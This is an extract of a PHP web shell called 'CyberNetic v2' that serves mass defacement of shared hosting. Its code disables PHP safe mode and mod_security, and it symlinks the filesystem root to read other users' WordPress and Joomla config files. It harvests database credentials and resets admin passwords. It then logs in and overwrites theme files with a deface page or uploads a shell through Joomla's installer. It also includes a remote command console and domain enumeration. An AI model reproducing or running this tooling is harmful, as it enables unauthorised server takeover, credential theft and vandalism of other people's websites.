
CyberNetic v2 by NCA


sQuo

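NCA Team's Private Shell — a PHP web shell that dispatches on the POST parameter `ac`. The listing below is an incomplete extract: it begins mid-statement and its HTML markup has been stripped. Relative to its working directory, the code writes `php.ini`, `.htaccess`, `bca/` (with a `bca/root` symlink to `/`), `cookie/`, `rootinject.tmp`, `login.txt`, `wp_site.txt`, `wp_index.txt`, `jm_site.txt` and `pca.html`.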

Code:
>SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckUnicodeEncoding Off";file_put_contents("php.ini",$byphp);file_put_contents(".htaccess",$byht);$_SESSION['safechk'] = "done";die("PHP Safe Mode ByPassed. Please Refresh This page");}}function convertByte($s) {    if($s >= 1073741824)        return sprintf('%1.2f', $s / 1073741824 ). ' GB';    elseif($s >= 1048576)        return sprintf('%1.2f', $s / 1048576 ) . ' MB';    elseif($s >= 1024)        return sprintf('%1.2f', $s / 1024 ) . ' KB';    else        return $s . ' B';}function curPageURL() { $pageURL = 'http'; if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";} $pageURL .= "://"; if ($_SERVER["SERVER_PORT"] != "80") {  $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"]; } else {  $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; } return $pageURL;}function chkDis($link,$str){$lol = get_headers($link,1);if(strpos($lol[0],"200")){$nan = file_get_contents($link);if(strpos($nan,$str)){return true;}else{ return false; }}else{ return false; }}function getDnamed(){if(is_readable("/var/named")){$list = scandir("/var/named");foreach($list as $domain){if(strpos($domain,".db")){$i += 1;$domain = str_replace('.db','',$domain);$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn[$owner['name']] = $domain;}}}return $dn;}function chkSys($link){$sys_arr = array("WordPress" => array("l" => "wp-config.php", "s" => "WordPress"),                          //"WordPress2" => array("l" => "blog/wp-config.php", "s" => "WordPress"),                          "Joomla" => array("l" => "configuration.php", "s" => "JConfig"),                          //"Joomla2" => array("l" => "joomla/configuration.php", "s" => "JConfig"),                         //"vBulletin" => array("l" => "includes/config.php", "s" => "vBulletin"),                         // "Drupal" => array("l" => "sites/default/settings.php", "s" => "Drupal"),                         // "SMF" 
=> array("l" => "Settings.php", "s" => "SMF"),                          //"osCommerce" => array("l" => "Settings.php", "s" => "DIR_WS_FUNCTIONS"),                          //"vBulletin2" => array("l" => "vb/includes/config.php", "s" => "vBulletin"),                          //"vBulletin3" => array("l" => "forum/includes/config.php", "s" => "vBulletin"),                          //"WHMCS" => "clients/configuration.php",                         // "WHMCS2" => "support/configuration.php",                         // "WHMCS3" => "client/configuration.php",                         // "WHMCS4" => "forum/includes/config.php",                          );              foreach($sys_arr as $k=>$dan){if(chkDis($link.$dan['l'],$dan['s'])){return array('link' => $link.$dan['l'], 'cms' => $k);}}}function EloFind($str,$start,$end){$len = strlen($str);$start_pos = (strpos($str,$start) + strlen($start));$str = substr($str,$start_pos);$end_pos = strpos($str,$end);$str = substr($str,0,$end_pos);return $str;    }function GetPage($url,$cookie,$post = null,$head = true) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, $head); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);If ($post != NULL){curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);}$urlPage = curl_exec($ch);if(curl_errno($ch)){echo curl_error($ch);}curl_close($ch);return($urlPage);}function throwErr($str){$arr = array("status" => "error", "msg" => $str);die(json_encode($arr));}function add2file($file,$str){if(file_exists($file)){$do = file_get_contents($file);if(!strpos($do,$str)){file_put_contents($file,$str,FILE_APPEND);}}else{file_put_contents($file,$str,FILE_APPEND);}}function 
doXploitWP($cnf,$html,$npass){$success = false;//Grabbing db info from symlink$str = file_get_contents($cnf);if(preg_match('%DB_USER%',$str)){$username=EloFind($str,"define('DB_USER', '","');");$password=EloFind($str,"define('DB_PASSWORD', '","');");$dbname=EloFind($str,"define('DB_NAME', '","');");$prefix=EloFind($str,"table_prefix  = '","'");//Connecting mysql and updating admin info$link=mysql_connect("localhost",$username,$password) ;if ($link) {mysql_select_db($dbname,$link) ;$req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");$req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"];}else{throwErr("Mysql Fail");}//Lets loginto wp now$status['site'] = $site_url;$cookie = 'cookie/'.md5($cnf).'.txt';@unlink($cookie);$logged_in = true;$url = $site_url."/wp-login.php";$postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';$logme = GetPage($url,$cookie,$postme);if(!preg_match('%logout%',$logme)){file_put_contents("login.txt",$site_url.$logme);throwErr("Login Error");}if($logged_in){//Lets go to theme editor now ;)$url = $site_url."/wp-admin/theme-editor.php";$themeditor = GetPage($url,$cookie,null);//Now sort out index and bla bla php to update $nola = explode(Chr(10),$themeditor);foreach($nola as $nline){if(preg_match('%theme-editor\.php\?file=%',$nline) && preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){$modify[EloFind($nline,'(',')')] = EloFind($nline,'$indfile){$nri = str_replace('.','_',$met);$nri = "n".$nri;if($_POST[$nri] == "on" && (!$success OR $met == "index.php")){$indfile =str_replace("&","&",$indfile);$url = trim($site_url."/wp-admin/".$indfile);$themepage = GetPage($url,$cookie,"");$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');$_file = EloFind($themepage,'name="file" 
value="','"');$nfile = explode('themes',$_file);$jfile = $site_url."/wp-content/themes".end($nfile);//Update file$url = $site_url."/wp-admin/theme-editor.php";$postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";$themedied = GetPage($url,$cookie,$postme);if(preg_match('%%',$themedied)){if(!$success){add2file("wp_site.txt",$jfile.Chr(10));}$success = true;if($met == "index.php"){add2file("wp_index.txt",$site_url.Chr(10));}}else{$error = true;}}}}else{throwErr("No file found");}if($success){$url = trim($site_url."/wp-admin/profile.php");$themepage = GetPage($url,$cookie,"");$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');$url = trim($site_url."/wp-admin/profile.php");$postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BangladeshCyberArmy&[email protected]&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";$themepage = GetPage($url,$cookie,$postme);$status['status'] = "success";die(json_encode($status));}else{if($error){throwErr("Could't Update the file");}else{throwErr("Selected file not found");}}}}else{throwErr("Config not found");}return true;}function doXploitJM($cnf,$html,$npass){//Grabbing db info from symlinkfunction joomlaCom($site_url,$cookie,$site){if($_POST['com_install'] == "on"){$url = $site_url . 
"/index.php?option=com_installer";$compage = GetPage($url,$cookie);preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);$hash = $dhash[1];preg_match_all('#value="/(.*?)"#s',$compage,$path);foreach($path[0] as $pathx){$pathx=ereg_replace('value="','',$pathx);$pathx=ereg_replace('"','',$pathx);}$dir = getcwd()."/bca.html";$postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");$url = $site_url . "/index.php?option=com_installer";$com_shell = GetPage($url,$cookie,$postme);if(preg_match('#Unknown Archive Type#s',$com_shell)){add2file("jm_site.txt",$site."/tmp/pca.html".Chr(10));$status['site'] = $site."/tmp/pca.html";$status['status'] = "success";die(json_encode($status));}else{return false;}}return true;}$str = file_get_contents($cnf);if(preg_match('%(JConfig|mosConfig)%',$str)){if(preg_match('%JConfig%', $str)){$username=EloFind($str,"\$user = '","'");$password=EloFind($str,"\$password = '","'");$dbname=EloFind($str,"\$db = '","'");$prefix=EloFind($str,"\$dbprefix = '","'");$pwd = md5($npass);if($_POST['domain'] != "..."){$site_url = $_POST['domain'];$site_url = "http://".$site_url;}else{$mailto = EloFind($str,"\$mailfrom = '","'");$siteul = explode('@',$mailto);$site_url = "http://".$siteul[1];}}elseif(preg_match('%mosConfig%',$str)){$username=EloFind($str,"\$mosConfig_user = '","'");$password=EloFind($str,"\$mosConfig_password = '","'");$dbname=EloFind($str,"\$mosConfig_db = '","'");$prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");$pwd = md5($npass);if($_POST['domain'] != "..."){$site_url = $_POST['domain'];$site_url = "http://".$site_url;}else{$mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");$siteul = explode('@',$mailto);$site_url = "http://".$siteul[1];}}$site = $site_url;$site_url = $site_url."/administrator/";$cookie = 
'cookie/'.md5($cnf).'.txt';@unlink($cookie);$link=mysql_connect("localhost",$username,$password) ;if ($link) {mysql_select_db($dbname,$link);$changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");$doit =mysql_query("SELECT * from  `".$prefix."extensions` ");if($doit){//Joomla 1.6if($_POST['ignore_def'] == "on"){$req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];if(strlen($template_name) ",$out);    } elseif (function_exists('passthru')) {        ob_start();        @passthru($in);        $out = ob_get_clean();            } elseif (function_exists('system')) {        ob_start();        @system($in);        $out = ob_get_clean();    } elseif (function_exists('shell_exec')) {        $out = shell_exec($in);    } elseif (is_resource($f = @popen($in,"r"))) {        $out = "";        while(!@feof($f))            $out .= fread($f,1024);        pclose($f);    }    return $out;}if($_POST['ac'] == "secinfo"){if(is_readable("/etc/named.conf")){echo '» /etc/named.conf is readable.
';}else{echo '» /etc/named.conf not readable 
';}if(is_readable("/etc/passwd")){echo '» /etc/passwd is readable.
';}else{echo '» /etc/passwd not readable 
';}if(is_readable("/etc/valiases")){echo '» /etc/valiases exists';if(is_array(scandir("/etc/valiases"))){echo ' & scanable';}echo '.
';}else{echo '» /etc/valiases not readable 
';}if(is_readable("/var/named")){echo '» /var/named exists';if(is_array(scandir("/var/named"))){echo ' & scanable';}echo '.
';}else{echo '» /var/named not readable 
';}if(ini_get('disable_functions')){echo '» '.ini_get('disable_functions').' are disabled
';}if(function_exists("symlink")){echo '» Symlinking allowed
';}else{echo '» Symlinking not allowed 
';}if(is_writable("/var/tmp")){echo '» /var/tmp folder is writable
';}if(is_readable('/var/log')){echo '» /var/log folder is readable
';}die();}elseif($_POST['ac'] == "sysinfo"){echo "System: ".php_uname()."
";echo "WebServer: ".$_SERVER['SERVER_SOFTWARE']."
";echo "PHP version: ".phpversion()." on ".php_sapi_name()."
";$ssys = "None";if(is_dir("/usr/local/cpanel")){$ssys = "Running On Cpanel";}elseif(is_dir("/usr/local/directadmin")){$ssys = "Running On Directadmin";}echo "Server System: ".$ssys."
";if(function_exists("disk_total_space")){echo "Free Disk: ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."
";}echo "Server IP: ".$_SERVER["SERVER_ADDR"]."
";die();}elseif($_POST['ac'] == "browse"){error_reporting(0);if($_POST['path'] != ""){$path = $_POST['path'];}else{$path = getcwd();}$filez = scandir($path);$q = 2;foreach($filez as $mfile){if($q == 2){$q = 1;}else{$q = 2;}$npath = $_POST['path'].$mfile;$stat = stat($npath);$usr = posix_getpwuid($stat['uid']);$grp = posix_getpwuid($stat['gid']);if(is_dir($npath)){$size = "Dir";}else{$size = convertByte($stat['size']);}$fperm = substr(sprintf('%o', fileperms($npath)), -4);if(!$fperm){$fperm = "Restricted";}elseif(is_writeable($npath)){$fperm = "".$fperm."";}elseif(is_readable($npath)){$fperm = "".$fperm."";}echo ''.$mfile.''.$size.'Modify'.$usr['name']."/".$grp['name'].''.$fperm.'Action';}die();}elseif($_POST['ac'] == "chknamed"){error_reporting(0);if(is_readable("/etc/named.conf")){$named = file_get_contents("/etc/named.conf");preg_match_all('%zone \"(.*)\" {%',$named,$domains);foreach($domains[1] as $domain){$domain = trim($domain);$i += 1;$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}echo "Total Domains Found: ".$i."
".$dn;die();}elseif(is_readable("/etc/valiases")){$list = scandir("/etc/valiases");foreach($list as $domain){$i += 1;$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}echo "Total Domains Found: ".$i."
".$dn;die();}elseif(is_readable("/var/named")){$list = scandir("/var/named");foreach($list as $domain){if(strpos($domain,".db")){$i += 1;$domain = str_replace('.db','',$domain);$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));$dn .= "".$domain." - ".$owner['name']."
";}}echo "Total Domains Found: ".$i."
".$dn;die();}else{die("'/etc/named.conf' is not readable. Try scan for public_html. (:");}}elseif($_POST['ac'] == "safebypass"){$byphp = "safe_mode = Offdisable_functions =safe_mode_gid = OFFopen_basedir = OFFallow_url_fopen = On";$byht = "SecFilterEngine OffSecFilterScanPOST OffSecFilterCheckURLEncoding OffSecFilterCheckUnicodeEncoding Off";file_put_contents("php.ini",$byphp);file_put_contents(".htaccess",$byht);echo "alert('Safe Mode ByPassed'); hideAll();";die();}elseif($_POST['ac'] == "chkph"){if(is_readable("/etc/passwd")){if(!is_dir("bca")){@mkdir('bca',0777);}$htaccss = "Options all  DirectoryIndex Sux.html  AddType text/plain .php  AddHandler server-parsed .php   AddType text/plain .html  AddHandler txt .html  Require None  Satisfy Any";file_put_contents("bca/.htaccess",$htaccss);$etc = file_get_contents("/etc/passwd");$etcz = explode("\n",$etc);foreach($etcz as $etz){$etcc = explode(":",$etz);error_reporting(0);if($enable_wp){symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"nca/".$etcc[0].'-WordPress.txt');}if($enable_phpbb){symlink('/home/'.$etcc[0].'/public_html/config.php',"nca/".$etcc[0].'-PhpBB.txt');}if($enable_vb){symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"nca/".$etcc[0].'-vBulletin.txt');}if($enable_joomla){symlink('/home/'.$etcc[0].'/public_html/configuration.php',"nca/".$etcc[0].'-Joomla.txt');symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"nca/".$etcc[0].'-Joomla.txt');symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"nca/".$etcc[0].'-Joomla.txt');}/**symlink('/home/'.$etcc[0].'/public_html/conf_global.php',"nca/".$etcc[0].'-IPB.txt');symlink('/home/'.$etcc[0].'/public_html/inc/config.php',"nca/".$etcc[0].'-MyBB.txt');symlink('/home/'.$etcc[0].'/public_html/Settings.php',"nca/".$etcc[0].'-SMF.txt');symlink('
/home/'.$etcc[0].'/public_html/sites/default/settings.php',"bca/".$etcc[0].'-Drupal.txt');symlink('/home/'.$etcc[0].'/public_html/e107_config.php',"nca/".$etcc[0].'-e107.txt');symlink('/home/'.$etcc[0].'/public_html/datas/config.php',"nca/".$etcc[0].'-Seditio.txt');symlink('/home/'.$etcc[0].'/public_html/includes/configure.php',"nca/".$etcc[0].'-osCommerce.txt'); **/}$lol = explode("/",curPageURL());$link = str_replace(end($lol),"",curPageURL());$str = file_get_contents($link."/nca");preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);if(is_array($exp[2])){$q = 2;$dmn = getDnamed();foreach($exp[2] as $sitez){if($q == 2){$q = 1;}else{$q = 2;}$j += 1;$sn = explode("-",$sitez);$domain = $dmn[$sn[0]];if($domain){$domain = "".$domain."";}else{$domain = "...";}$nan .= ''.$sn[0].''.$domain.''.ucfirst($sn[1]).'Idle...';}$cnt = '';echo $nan.$cnt;//echo "Total Sites Found: ".$j."

".$nan;}}die();}elseif($_POST['ac'] == "chkph2"){if(is_readable("/etc/passwd")){if(!is_dir("bca")){@mkdir('bca',0777);}if(!is_link("bca/root")){$sym = symlink("/","bca/root");if(!$sym){die("Symlink method failed.");}}$htaccss = "Options all  DirectoryIndex Sux.html  AddType text/plain .php  AddHandler server-parsed .php   AddType text/plain .html  AddHandler txt .html  Require None  Satisfy Any";file_put_contents("bca/.htaccess",$htaccss);$etc = file_get_contents("/etc/passwd");$etcz = explode("\n",$etc);$lol = explode("/",curPageURL());$link = str_replace(end($lol),"",curPageURL());@unlink("rootinject.tmp");$q = 2;$dmn = getDnamed();foreach($etcz as $etz){$etcc = explode(":",$etz);$dr = "bca/root/home/".$etcc[0]."/public_html/";$dan = chkSys($link.$dr);if($dan){if($q == 2){$q = 1;}else{$q = 2;}$domain = $dmn[$etcc[0]];if($domain){$domain = "".$domain."";}else{$domain = "...";}$k += 1;$nant = ''.$etcc[0].''.$domain.''.$dan['cms'].'Idle...';file_put_contents("rootinject.tmp",$nant,FILE_APPEND);$nan .= $nant;}}$cnt = '';echo $nan.$cnt;//file_put_contents("tmpupdts.log","done");}die();}elseif($_POST['ac'] == "inject"){error_reporting(0);$cms = strtolower($_POST['cms']);$cnf = $_POST['conf'];if(file_exists(md5($_POST['deface_page']))){$html = file_get_contents(md5($_POST['deface_page']));}else{$html = file_get_contents($_POST['deface_page']);file_put_contents(md5($_POST['deface_page']),$html);file_put_contents("pca.html",$html);}if(!is_dir("cookie")){@mkdir("cookie",0777);}switch($cms){case "wordpress":doXploitWP($cnf,$html,"uradhura123");break;case "joomla":doXploitJM($cnf,$html,"uradhura123");break;case "vbulletin":doXploitVB($cnf,$html);break;case "phpbb":break;case "ipb":break;case "mybb":break;case "oscommerce":break;case "smf":break;case "drupal":break;case "seditio":break;case "e107":break;}throwErr("Not Added");}elseif($_POST['ac'] == "ssh"){$ssh = exme($_POST['command']);die(nl2br($ssh));}elseif($_POST['ac'] == "phpinfo"){$php = 
phpinfo();die($php);}?>Cybernetic v2 By [Nigerian Cyber Army]body{font-family: "courier new";background-color: black;font-size:80%;color: #28FE14;background-image: url("data:image/gif;base64,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");}#sysinfo{border: 1px solid #28FE14;position:fixed;padding:2px;top:1px;left:1px;background-color: black;font-size:12px;}#phpinfo{border: 1px solid #28FE14;position:fixed;padding:2px;top:1px;right:1px;background-color: black;font-size:12px;}#status{border: 1px solid #28FE14;position:fixed;padding:2px;bottom:1px;right:1px;background-color: black;font-size:12px;}#infobox{z-index:1;border: 1px solid white;margin-left:auto;margin-right:auto;margin-top:50px;width:600px;background-color: black;font-size:12px;}.infotitle{padding:4px;background-color: white;color: black;font-family: Thaoma;font-size:14px;}.infotxt{padding:5px;}.sidebar{position:fixed;left:1px;top:30%;}.stitle{float:left;cursor:pointer;padding:7px;color:black;background-color: white;}.stitle:hover{color:red;}.smnu{display:none;background-color: black;padding:5px;border: 1px solid white;float:left;}a{color: #df5;text-decoration: none;}a:hover{color:white;}.copyright{position:fixed;bottom:1px;left:1px;padding:2px;}.logo{margin:auto;width:500px;height:550px;background-image: url("http://www3.picturepush.com/photo/a/12062046/img/Anonymous/jkjjjkjkjhjjkjhhhhhhhhhhhhhhhhhhh.jpg");}.filetable{margin-top:2px;width:740px;}.tblcnt{text-align: center;margin-left:2px;color:black;background-color: white;padding:3px;float:left;border: 1px solid white;}.tblbx1{height:12px;text-align: center;margin-left:2px;color:white;background-color: #333333;padding:3px;float:left;border: 1px solid #333333;}.tblbx2{height:12px;text-align: center;margin-left:2px;color:white;background-color: 
#444444;padding:3px;float:left;border: 1px solid #444444;}.tbl{margin-top:100px;padding-top:2px;padding-bottom: 2px;margin:auto;width:742px;border: 1px solid white;}.rbox{float:left;border: 1px solid #28FE14;padding:10px;}.smit{background-color: black;color: #28FE14;}.sshbox{display:none;padding-left:7px;width:600px;height:400px;margin: auto;margin-top:80px;-webkit-border-radius: 10px;-moz-border-radius: 10px;border-radius: 10px;border:3px solid #FFF5F5;background-color:#080500;overflow:auto;}#sshcmd{width:450px;background-color: #080500;color:#28FE14;border:none;}OS:  Safe Mode On";}else{    echo " Safe Mode Off";}?>NameSizeModifyOwnerPermissionActionUserSitenameCMSStatus[-] Informationvar sidebar = false;var sidebar2 = false;function sidebarz(){$('#logo').hide();if(sidebar){$('#smnu').hide();sidebar = false;}else{$('#smnu').show();sidebar = true;}}function sidebarz2(){if(sidebar2){$('#smnu2').hide();sidebar2 = false;}else{$('#smnu2').show();sidebar2 = true;}}function filebrs(val){hideAll();$('#status').html('Status: Requesting...');$.post("", { ac: "browse", path: val},function(data) {$('#tbl').show();$('#status').html('Status: Completed (:'); $('#filest').html(data);});}function doUpdt(val){ var refreshId = setInterval(function() {      $("#injtbl").load('rootinject.tmp');   }, 5000);   $.ajaxSetup({ cache: false });hideAll();$('#inject').show();$('#status').html('Status: Requesting...');$.post("", { ac: val},function(data) {refreshId = "";$('#sidebar2').show();$('#status').html('Status: Completed (:'); $('#injtbl').html(data);});}function hideAll(){k1 = 0;k2 = 0;$('#sidebar2').hide();$('#tbl').hide();$('#inject').hide();$('#infobox').hide();$('#sshbox').hide();}function doReq(val){hideAll();$('#inject').show();$('#status').html('Status: Requesting...');$.post("", { ac: val},function(data) {$('#sidebar2').show();$('#status').html('Status: Completed (:'); $('#injtbl').html(data);});}function doReq2(val){hideAll();$('#status').html('Status: 
Requesting...');$.post("", { ac: val},function(data) {$('#infobox').show();$('#status').html('Status: Completed (:'); $('#infotxt').html(data);});}//Js Multi thread post request by Elo (:var k1 = 1; var k2 = 0; var req_limit = 9;function doInject(){var i = 0; var j = 0;$('.conf').each(function(){i += 1;var id = $(this).attr('title');if(id > k1){ j += 1; k1 += 1;var link = $(this).attr('href');var domain = $('#inj_dom' + id).html();var cms = $(this).html();doPost2(link,cms,id,domain);}if(j > req_limit){return false;}});}function doPost2(link,cmz,id,dmn){if($('#injchk'+id).is(':checked')){$('#inj_status' + id).html('Injecting...');$.ajax({  url: "",  type: "POST",  timeout: 60000,  data: {ac: "inject", conf: link, domain: dmn, cms: cmz, ignore_def: $('#ignore_def:checked').val(), n404_php: $('#404_php:checked').val(), nindex_php: $('#index_php:checked').val(), nhome_php: $('#home_php:checked').val(), narchive_php: $('#archive_php:checked').val(), ncomment_php: $('#comment_php:checked').val(), com_install: $('#use_com:checked').val(), deface_page: $('#deface_page').val()},  dataType: "text"}).done(function(msg) {k2 += 1;$('#inj_status' + id).html('Parse Error');$('#inj_status' + id).css({"background-color" : "red", "color" : "white"});var res_data = JSON.parse(msg);if(res_data.status == "success"){$('#inj_domain' + id).html('<a class="injwork" href="' + res_data.site + '">' + res_data.site + '');$('#inj_status' + id).css({"background-color" : "green", "color" : "white"});$('#inj_status' + id).html('Success');$('#injst' + id).removeClass("conf");}else{if(res_data.status == "error"){$('#inj_status' + id).css({"background-color" : "red", "color" : "white"});$('#inj_status' + id).html(res_data.msg);$('#inj_status' + id).addClass("injerror");$('#injst' + id).removeClass("conf");}else{$('#inj_status' + id).addClass("injerror");$('#inj_status' + id).html('Unknown');$('#injst' + id).removeClass("conf");}}updateInjSts(k2);if(k1 == k2){doInject();}}).fail(function(jqXHR, 
textStatus) {k2 += 1;$('#inj_status' + id).css({"background-color" : "black", "color" : "white"});$('#inj_status' + id).html('Timeout');updateInjSts(k2); if(k1 == k2){doInject();} });}else{k2 += 1;updateInjSts(k2);if(k1 == k2){doInject();} }}//Js Multi thread post request by Elo (:function updateInjSts(k){var tc = $('#sitecount').val();if(tc > k){$('#status').html("Status: " + k + "/" + tc + " Injected");}else{$('#status').html("Status: Injection Complete (:");}}function rmvErr(){$('.injerror').each(function(){var nano = $(this).parent();$(nano).remove();});}function rmvSlct(){$('.conf').each(function(){var id = $(this).attr('title');if($('#injchk'+id).is(':checked')){$('#inj' + id).remove();}});}function retryTimeout(){k1 = 1; k2 = 0;doInject();}function doSlct(){$('.conf').each(function(){var id = $(this).attr('title');doToggle(id);});}function doToggle(dd){if($('#injchk'+dd).is(':checked')){$('#injc'+dd).css('background-color','red');$('#injchk'+dd).attr('checked',false);}else{$('#injc'+dd).css('background-color','#76BBEB');$('#injchk'+dd).attr('checked',true);}}function doSSH(){$('#status').html("Status: Requesting...");var cmd = $('#sshcmd').val();$('#sshcmd').val("");$.post("", { ac: "ssh",command: cmd},function(data) {$('#sshoutput').append("[root@BBHH~]# <br />"+data+"<br />");$('#status').html("Status: Done.");});}
[root@bca~]# » Security Vulnerability» System Information» PHP Info» File Browser» Scan Domains» CMS Detector [simple]» CMS Detector [root]» Bypass PHP Safe_Mode» Network Tools» SQL Manager» Command Console» Kill MeEXPLOIT» Start Injecting» Export» Rmv Error» Rmv Selected» Retry timeout» Submit to zone-H» SettingsWordPress
404.php
archive.php
index.php
home.php
comment.php


Joomla
Use Com Installer
